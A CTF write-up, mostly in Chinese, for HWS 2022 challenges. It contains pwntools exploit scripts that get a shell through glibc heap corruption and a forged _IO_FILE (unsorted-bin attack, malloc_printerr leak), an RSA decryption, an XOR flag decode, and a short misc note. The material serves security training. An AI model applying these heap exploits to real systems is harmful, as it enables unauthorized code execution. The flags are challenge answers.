hws_2022_wp

pwn

送分题

一道原题(https://www.anquanke.com/post/id/258512):利用 Unsorted Bin Attack 改写 global_max_fast,然后劫持 _IO_list_all,伪造一个 _IO_FILE 结构体,借助 _IO_str_finish 来拿 shell。

exp

from pwn import *

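context.log_level = 'debug'

binary = './pwn'
local = 0
if local:
    p = process(binary)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    p = remote('1.13.162.249', 10001)
    libc = ELF('./libc-2.27.so')
elf = ELF(binary)

# gdb.attach(p, 'b *$rebase(0xabd)')
# Answer the two "size?" prompts, then the ")" prompt with 'y'.
p.sendlineafter('size?\n', str(0x1430))
p.sendlineafter('size?\n', str(0x5000))
p.sendlineafter(')\n', 'y')
# Read up to the 0x7f byte of the echoed libc pointer, keep its last six
# bytes and widen to eight.  The pointer lies 0x70 past __malloc_hook, so
# subtracting both gives the libc base.  b'\x00' keeps the padding
# bytes-safe on Python 3 (a str fill would raise there).
leak = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
libc_base = leak - 0x70 - libc.sym['__malloc_hook']
success('libc_base -> {}'.format(hex(libc_base)))
# Addresses used below.  The raw offsets are specific to the libc-2.27 build
# shipped with the challenge.  The original script computed IO_str_jumps twice
# (the second time from a one-off gdb session's absolute addresses, giving the
# same 0x3e8360); it is defined once here.
system = libc_base + libc.sym['system']
global_max_fast = libc_base + 0x3ed940
IO_str_jumps = libc_base + 0x3e8360
binshsdd = libc_base + 0x1b40fa
# pause()
# Two pointers: the leaked libc address and global_max_fast-0x10 -- the
# unsorted-bin write described in the writeup.
payload = p64(libc_base + 0x70 + libc.sym['__malloc_hook']) + p64(global_max_fast - 0x10)
p.sendafter('name!\n', payload)
p.sendlineafter(')\n', '1')
# Fake _IO_FILE.  Per the writeup, the vtable slot points at _IO_str_jumps and
# _IO_str_finish ends up calling the pointer placed right after it (system).
fake_IO_FILE = p64(0) * 2
fake_IO_FILE += p64(0) + p64(binshsdd + 1)
fake_IO_FILE += p64(0) + p64(0)
# '//' keeps this an int; '/' yields a float on Python 3 and p64() rejects it.
fake_IO_FILE += p64((binshsdd - 100) // 2) + p64(0)
fake_IO_FILE = fake_IO_FILE.ljust(0xb0, b'\x00')
fake_IO_FILE += p64(0xFFFFFFFFFFFFFFFF) + p64(0) * 2
fake_IO_FILE += p64(IO_str_jumps)
fake_IO_FILE += p64(system)
p.send(fake_IO_FILE)
p.interactive()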

peach

这道题应该是由祥云杯的 lemon 改编而来的,可以参考当时的官方解法。

  1. 在堆的分配、释放过程中检测到错误时,会调用 malloc_printerr 处理错误

  2. 在 glibc-2.26 及之前的版本中,malloc_printerr 会根据 check_action 的值执行不同的分支:当 action & 1 为 true 时会打印程序名,因此存在 leak

exp

from pwn import *

context.log_level = 'debug'

binary = './peachw'
local = 0
# The same libc file is used in both modes; only the transport differs.
p = process(binary) if local else remote('1.13.162.249', 10003)
libc = ELF('./libc/libc-2.26.so')
elf = ELF(binary)

def add(index, name, size, content):
    """Menu choice 1: create a peach at *index*.

    Unlike the other helpers this sends the menu byte immediately instead of
    waiting for the 'choice: ' prompt, then answers the index, name and size
    prompts in order.  The description is sent only when the next line the
    service prints contains "descripe"; in either case the call returns once
    "Success!" has been read.  Uses the module-level tube ``p``.
    """
    p.send('\x01')
    p.sendlineafter('? ', str(index))
    p.sendafter(': \n', name)
    p.sendlineafter('peach:\n', str(size))
    rv = p.recvline()
    if b"descripe" in rv:
        p.send(content)
    p.recvuntil("Success!\n")

def free(index):
    """Menu choice 2: delete the peach at *index* (module-level tube ``p``)."""
    p.sendafter('choice: ', '\x02')
    p.sendlineafter(' ?\n', str(index))

def show(index, num):
    """Menu choice 3: show the peach at *index*.

    *num* is sent raw (no newline) in answer to the 'number?' prompt.
    Uses the module-level tube ``p``.
    """
    p.sendafter('choice: ', '\x03')
    p.sendlineafter(' ? ', str(index))
    p.sendafter('number?\n', num)

def edit(index, size, content):
    """Menu choice 4: overwrite the peach at *index*.

    *size* is sent as a 16-bit little-endian value (p16), not as text, and
    *content* is sent raw after the 'peach' prompt.  Uses the module-level
    tube ``p``.
    """
    p.sendafter('choice: ', '\x04')
    p.sendlineafter(' ? ', str(index))
    p.sendafter('peach : ', p16(size))
    p.sendafter('peach \n', content)

# gdb.attach(p)
# Greeting: a 0x1d-byte answer, "yes" NUL-terminated and padded with 'a'.
p.sendafter('peach?\n', 'yes\x00'.ljust(0x1d, 'a'))
# Whatever follows "peach is " is parsed as a base-10 number, but only its
# first five characters are used, and 96 is subtracted.
# NOTE(review): this assumes the printed value has at least five digits and
# that the result fits in 16 bits for the p16() below -- confirm against the
# binary.
p.recvuntil('peach is ')
stack_addr = int(p.recv()[0:5], 10) - 96
success('stack_addr -> {}'.format(hex(stack_addr)))
# A 0x430-byte peach in slot 0, freed straight away.
add(0, 'a', 0x430, 'a')
free(0)

# Slot 0 again: single-byte name, 0x300 requested, content is a 0 / 0x31 pair.
add(0, '\xa0', 0x300, p64(0) + p64(0x31))

add(1, 'a', 0x100, 'a')
add(2, 'a', 0x100, 'a')
# NOTE(review): index -36 is negative; which entry it reaches depends on the
# binary's table layout, which is not visible here.  The content is 0x198
# filler bytes followed by stack_addr packed as 16 bits.
edit(-36, 0x220, 'a'*0x198 + p16(stack_addr))
# pause()
# Per the writeup, this free is what makes the service print the leak
# (malloc_printerr path); the rest of the output is collected into msg.
free(2)
msg = p.recv()
# NOTE(review): on Python 3 recv() returns bytes and this comparison would
# need b"flag"; as written the script targets Python 2.
if "flag" in msg:
    print(msg)
p.interactive()

crypto

babyrsa

在线分解n得到p和q

# The two prime factors of n, as returned by the online factorisation.
p, q = (
    98197216341757567488149177586991336976901080454854408243068885480633972200382596026756300968618883148721598031574296054706280190113587145906781375704611841087782526897314537785060868780928063942914187241017272444601926795083433477673935377466676026146695321415853502288291409333200661670651818749836420808033,
    133639826298015917901017908376475546339925646165363264658181838203059432536492968144231040597990919971381628901127402671873954769629458944972912180415794436700950304720548263026421362847590283353425105178540468631051824814390421486132775876582962969734956410033443729557703719598998956317920674659744121941513,
)
import gmpy2
from Crypto.Util.number import long_to_bytes

# Public exponent e, the two factors of n obtained by online factorisation,
# and the ciphertext c.
e = 2199344405076718723439776106818391416986774637417452818162477025957976213477191723664184407417234793814926418366905751689789699138123658292718951547073938244835923378103264574262319868072792187129755570696127796856136279813658923777933069924139862221947627969330450735758091555899551587605175567882253565613163972396640663959048311077691045791516671857020379334217141651855658795614761069687029140601439597978203375244243343052687488606544856116827681065414187957956049947143017305483200122033343857370223678236469887421261592930549136708160041001438350227594265714800753072939126464647703962260358930477570798420877
p = 98197216341757567488149177586991336976901080454854408243068885480633972200382596026756300968618883148721598031574296054706280190113587145906781375704611841087782526897314537785060868780928063942914187241017272444601926795083433477673935377466676026146695321415853502288291409333200661670651818749836420808033
q = 133639826298015917901017908376475546339925646165363264658181838203059432536492968144231040597990919971381628901127402671873954769629458944972912180415794436700950304720548263026421362847590283353425105178540468631051824814390421486132775876582962969734956410033443729557703719598998956317920674659744121941513
c = 1492164290534197296766878830710549288168716657792979479408332026408553210558539364503279432780006256047888761718878241924947937039103166564146378209168719163067531460700424309878383312837345239570897122826051628153030129647363574035072755426112229160684859510640271933580581310029921376842631120847546030843821787623965614564745724229763999106839802052036834811357341644073138100679508864747009014415530176077648226083725813290110828240582884113726976794751006967153951269748482024859714451264220728184903144004573228365893961477199925864862018084224563883101101842275596219857205470076943493098825250412323522013524

# Textbook RSA once n is factored: phi(n) = (p-1)(q-1), d = e^-1 mod phi(n),
# m = c^d mod n.
n = p * q
phin = (p - 1) * (q - 1)
d = gmpy2.invert(e, phin)
m = pow(c, d, n)
print(long_to_bytes(m))

misc

badPDF

这也是个原题(https://zyazhb.github.io/2020/08/16/ctf-hws/#fakepdf),最后用 Python 写个解密脚本就可以。

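text = '676d60667a64333665326564333665326564333665326536653265643336656564333665327c'

# The hex string is a byte stream in which every byte was XORed with 1.
# Decode the hex with the stdlib instead of walking it two characters at a
# time with a hand-kept offset, and build the result with one join rather
# than repeated string concatenation.  bytearray.fromhex() rejects an
# odd-length string, where the original loop would silently drop the last
# nibble.
flag = ''.join(chr(b ^ 1) for b in bytearray.fromhex(text))
print(flag)
# flag{e27d3de27d3de27d3d7d3de27dde27d3}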

gogogo

提取个压缩包

提取剪切板

最后提取出一个二维码,但没能解出来:Aztec 码之类的格式之前没接触过。

